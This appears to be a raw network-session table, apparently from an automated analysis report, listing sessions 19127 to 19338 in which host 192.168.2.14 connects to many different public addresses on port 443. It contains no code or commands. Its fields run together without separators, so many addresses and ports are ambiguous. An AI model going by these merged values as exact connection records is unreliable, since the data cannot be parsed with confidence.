                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19127192.168.2.1459034105.86.155.7443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19128192.168.2.1454452108.19.118.117443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19129192.168.2.1434158116.102.28.177443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19130192.168.2.1436178171.108.111.64443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19131192.168.2.1448144209.255.138.43443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19132192.168.2.143405613.251.30.175443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19133192.168.2.143852417.138.138.23443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19134192.168.2.144572274.147.149.243443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19135192.168.2.1447568123.143.213.163443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19136192.168.2.144972082.177.218.12443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19137192.168.2.1445574167.142.211.109443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19138192.168.2.1449980123.5.189.114443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19139192.168.2.1452428102.204.53.203443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19140192.168.2.14408862.119.148.91443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19141192.168.2.1446464178.193.228.72443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19142192.168.2.144186087.22.23.92443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19143192.168.2.143505437.111.124.56443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19144192.168.2.145717483.230.41.240443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19145192.168.2.143522676.76.65.115443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19146192.168.2.1446646210.197.37.180443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19147192.168.2.144787636.126.196.243443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19148192.168.2.1449204149.84.77.244443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19149192.168.2.1438802187.143.207.78443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19150192.168.2.146013485.168.225.129443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19151192.168.2.145031271.25.101.221443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19152192.168.2.1447910115.178.209.220443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19153192.168.2.1433378160.80.14.134443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19154192.168.2.1443266137.15.139.230443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19155192.168.2.144784675.52.43.77443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19156192.168.2.145942682.202.159.157443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19157192.168.2.1452662154.213.208.61443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19158192.168.2.144077842.181.222.156443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19159192.168.2.1441550177.4.238.188443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19160192.168.2.1450204223.124.83.108443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19161192.168.2.1459342109.25.251.187443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19162192.168.2.1460998212.244.25.95443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19163192.168.2.1447154197.225.11.220443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19164192.168.2.145373297.103.212.89443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19165192.168.2.144785660.241.160.4443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19166192.168.2.145742225.97.190.224443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19167192.168.2.145446680.190.141.80443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19168192.168.2.1439988145.13.37.70443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19169192.168.2.1459400155.60.174.193443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19170192.168.2.1444414209.3.43.85443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19171192.168.2.1447698122.166.6.15443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19172192.168.2.1435014104.145.94.43443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19173192.168.2.1439382178.234.149.212443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19174192.168.2.1442596194.141.170.153443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19175192.168.2.146034866.135.141.6443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19176192.168.2.1451280114.137.38.231443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19177192.168.2.1459670118.83.97.51443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19178192.168.2.1445858178.66.69.81443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19179192.168.2.1451714145.225.22.131443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19180192.168.2.145070231.137.170.225443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19181192.168.2.144272490.103.135.160443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19182192.168.2.1458546142.61.76.140443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19183192.168.2.1442540221.142.84.5443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19184192.168.2.144421041.158.16.177443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19185192.168.2.1437230165.65.164.197443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19186192.168.2.1448252200.51.127.175443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19187192.168.2.1454352140.167.118.164443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19188192.168.2.144316686.168.224.152443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19189192.168.2.1458100210.202.46.201443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19190192.168.2.1453356103.25.74.138443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19191192.168.2.143429825.97.247.249443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19192192.168.2.1438784185.166.216.162443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19193192.168.2.144308818.164.204.56443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19194192.168.2.144130258.102.132.94443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19195192.168.2.1460654131.255.50.188443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19196192.168.2.1433270119.6.89.105443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19197192.168.2.1436196222.237.124.214443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19198192.168.2.145179034.53.136.220443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19199192.168.2.144417241.240.89.9443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19200192.168.2.1436562116.115.232.186443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19201192.168.2.1434370100.28.203.33443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19202192.168.2.145738892.75.152.214443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19203192.168.2.1437862139.182.35.59443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19204192.168.2.1452114173.31.34.249443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19205192.168.2.1455822218.108.156.12443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19206192.168.2.145886459.28.35.124443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19207192.168.2.1459934170.170.227.90443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19208192.168.2.1440810166.148.129.63443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19209192.168.2.145661059.38.250.123443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19210192.168.2.14332524.190.103.90443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19211192.168.2.144307866.146.221.63443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19212192.168.2.1459452183.85.13.244443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19213192.168.2.1448006133.229.19.172443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19214192.168.2.143535641.109.163.222443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19215192.168.2.144158853.178.27.161443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19216192.168.2.145967496.17.118.33443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19217192.168.2.1453774130.100.2.57443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19218192.168.2.145247650.107.66.136443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19219192.168.2.144294018.87.176.68443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19220192.168.2.1457844182.14.26.51443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19221192.168.2.1457660218.201.64.121443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19222192.168.2.1446434172.58.248.33443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19223192.168.2.1438978223.24.242.88443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19224192.168.2.1444560151.13.30.185443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19225192.168.2.1455022177.4.113.151443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19226192.168.2.144821092.199.196.242443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19227192.168.2.1436088103.250.69.19443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19228192.168.2.1445000157.101.235.28443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19229192.168.2.14389542.224.202.80443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19230192.168.2.14553764.91.73.128443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19231192.168.2.1460914151.98.244.20443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19232192.168.2.1435694163.221.33.61443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19233192.168.2.1436550155.54.168.39443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19234192.168.2.143545257.120.76.217443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19235192.168.2.1454714126.192.199.177443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19236192.168.2.144150072.22.130.15443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19237192.168.2.1440624203.113.198.115443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19238192.168.2.145859075.163.7.121443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19239192.168.2.144010281.216.120.224443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19240192.168.2.145325019.3.95.133443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19241192.168.2.144008271.53.161.52443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19242192.168.2.145629223.218.13.212443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19243192.168.2.1436366206.113.8.250443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19244192.168.2.14487465.2.39.92443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19245192.168.2.146024043.39.153.49443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19246192.168.2.1436584128.154.232.214443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19247192.168.2.1434044168.36.62.44443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19248192.168.2.1460956175.103.105.56443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19249192.168.2.1438166151.173.179.98443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19250192.168.2.144238680.59.73.72443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19251192.168.2.1449980110.230.157.165443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19252192.168.2.143942641.146.251.225443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19253192.168.2.143826017.48.176.33443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19254192.168.2.1454330189.112.250.86443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19255192.168.2.145691876.125.92.44443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19256192.168.2.1446912186.109.58.122443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19257192.168.2.1435772146.246.218.62443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19258192.168.2.144036661.97.107.44443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19259192.168.2.1452326218.199.25.41443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19260192.168.2.145256045.152.103.87443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19261192.168.2.1447484198.151.142.234443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19262192.168.2.144156899.64.235.248443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19263192.168.2.144433878.217.220.90443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19264192.168.2.1455938168.69.69.66443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19265192.168.2.145192068.9.126.86443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19266192.168.2.1456218216.160.23.23443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19267192.168.2.1438070109.148.202.64443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19268192.168.2.143529244.217.168.254443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19269192.168.2.143343854.164.53.238443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19270192.168.2.144198684.55.43.5443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19271192.168.2.1447630128.21.18.87443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19272192.168.2.1447542223.241.133.183443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19273192.168.2.144436495.143.137.147443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19274192.168.2.1459676138.56.174.194443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19275192.168.2.1433484205.127.52.14443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19276192.168.2.1454492126.62.75.133443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19277192.168.2.1452766133.223.94.64443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19278192.168.2.1459078140.195.42.61443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19279192.168.2.1442500162.104.14.144443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19280192.168.2.1441190193.239.114.12443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19281192.168.2.144638681.247.1.29443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19282192.168.2.1452888188.203.93.4443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19283192.168.2.1434676170.71.168.109443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19284192.168.2.145287286.245.108.119443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19285192.168.2.145416877.90.128.108443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19286192.168.2.1445326203.102.142.160443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19287192.168.2.145021412.112.24.225443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19288192.168.2.1460762148.151.39.62443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19289192.168.2.1440238158.222.129.95443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19290192.168.2.1458688156.136.21.60443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19291192.168.2.14551525.129.162.134443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19292192.168.2.143342294.83.197.46443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19293192.168.2.143298237.27.159.71443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19294192.168.2.14560284.43.90.55443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19295192.168.2.1449592216.169.186.95443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19296192.168.2.1449328201.41.60.33443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19297192.168.2.144279670.206.169.87443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19298192.168.2.1450828204.110.104.133443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19299192.168.2.143303284.224.239.67443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19300192.168.2.1460168114.81.180.212443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19301192.168.2.145856092.242.112.205443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19302192.168.2.1444468113.83.168.190443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19303192.168.2.143530493.112.139.140443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19304192.168.2.145676464.84.0.111443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19305192.168.2.143354875.102.101.133443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19306192.168.2.143420496.63.225.69443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19307192.168.2.1434522185.218.12.181443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19308192.168.2.1440322101.3.90.9443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19309192.168.2.1447048220.22.67.87443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19310192.168.2.1446510179.106.226.190443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19311192.168.2.145706237.50.132.170443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19312192.168.2.1445228217.103.221.145443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19313192.168.2.1442654106.93.202.0443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19314192.168.2.144883474.99.156.180443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19315192.168.2.1436090101.55.170.24443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19316192.168.2.145997048.159.137.26443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19317192.168.2.1456066118.120.62.166443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19318192.168.2.145134676.108.143.172443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19319192.168.2.14389325.67.247.166443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19320192.168.2.145868435.157.51.246443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19321192.168.2.1458866209.143.103.183443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19322192.168.2.1457198188.142.103.143443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19323192.168.2.1443364117.245.124.238443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19324192.168.2.1457882133.194.221.52443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19325192.168.2.1458292201.5.41.141443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19326192.168.2.1453338157.11.0.55443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19327192.168.2.143320039.11.76.221443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19328192.168.2.1440180172.153.6.37443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19329192.168.2.1438912129.173.186.31443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19330192.168.2.1453048196.171.225.156443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19331192.168.2.144806053.10.178.132443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19332192.168.2.1438980163.157.73.153443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19333192.168.2.1453782149.195.4.18443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19334192.168.2.1459340131.91.110.130443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19335192.168.2.1444586220.33.46.254443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19336192.168.2.143435896.163.39.213443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19337192.168.2.1449814156.24.93.162443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19338192.168.2.145267683.41.84.9443
                                                        TimestampBytes transferredDirectionData


